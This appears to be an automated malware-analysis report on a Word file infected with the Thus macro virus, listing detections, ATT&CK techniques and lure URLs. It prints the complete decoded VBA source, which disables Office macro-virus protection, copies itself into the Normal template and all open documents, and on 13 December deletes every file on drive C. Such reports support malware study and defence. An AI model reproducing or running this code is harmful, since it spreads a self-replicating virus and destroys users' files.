MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1553.005 Security Software Installation
The sample contains VBA macros that execute upon opening the document, disabling macro security and attempting to replicate the malicious code to other documents. The document body contains embedded URLs and instructions to visit a website, likely as a lure. The VBA script's self-replication and disabling of security features are key indicators of malicious intent.
Heuristics 5
-
ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-8
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001' -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.ancientgreece.com/images/titlesm.gif In document text (OLE body)
- http://www.ancientgreece.com/images/greece_line.gifIn document text (OLE body)
- http://www.ancientgreece.com/html/art_frame.htmIn document text (OLE body)
- http://www.ancientgreece.com/buttons/art2.gifIn document text (OLE body)
- http://www.ancientgreece.com/html/geography_frame.htmIn document text (OLE body)
- http://www.ancientgreece.com/buttons/geography2.gifIn document text (OLE body)
- http://www.ancientgreece.com/html/history_frame.htmIn document text (OLE body)
- http://www.ancientgreece.com/buttons/history2.gifIn document text (OLE body)
- http://www.ancientgreece.com/images/ancientgreece.gifIn document text (OLE body)
- http://www.ancientgreece.com/html/mythology_frame.htmIn document text (OLE body)
- http://www.ancientgreece.com/buttons/odyseusz2.gifIn document text (OLE body)
- http://www.ancientgreece.com/html/olympics_frame.htmIn document text (OLE body)
- http://www.ancientgreece.com/buttons/olympics2.gifIn document text (OLE body)
- http://www.ancientgreece.com/html/people_frame.htmIn document text (OLE body)
- http://www.ancientgreece.com/buttons/people2.gifIn document text (OLE body)
- http://www.ancientgreece.com/html/wars_frame.htmIn document text (OLE body)
- http://www.ancientgreece.com/buttons/wars2.gifIn document text (OLE body)
- http://www.ancientgreece.com/html/other_frame.htmIn document text (OLE body)
- http://www.ancientgreece.com/buttons/other2.gifIn document text (OLE body)
- http://www.teacherweb.comIn document text (OLE body)
- http://www.ancientgreece.comIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2349 bytes |
SHA-256: 148463b71af2433c061c528c6bb7ae214dfa6ef6dc4d157d2709c1351df19400 |
|||
|
Detection
ClamAV:
Doc.Trojan.Thus-8
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
.CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.DeleteLines 1, Application.Documents.Item(k) _
.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
.VBComponents.Item(1).CodeModule.CountOfLines)
End If
Next k
If (Day(Now()) = 13) And (Month(Now()) = 12) Then
With Application.FileSearch
.NewSearch
.LookIn = "C:\"
.SearchSubFolders = True
.FileName = "*.*"
.MatchTextExactly = False
.FileType = msoFileTypeAllFiles
If .Execute > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
End Sub
Private Sub Document_Close()
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.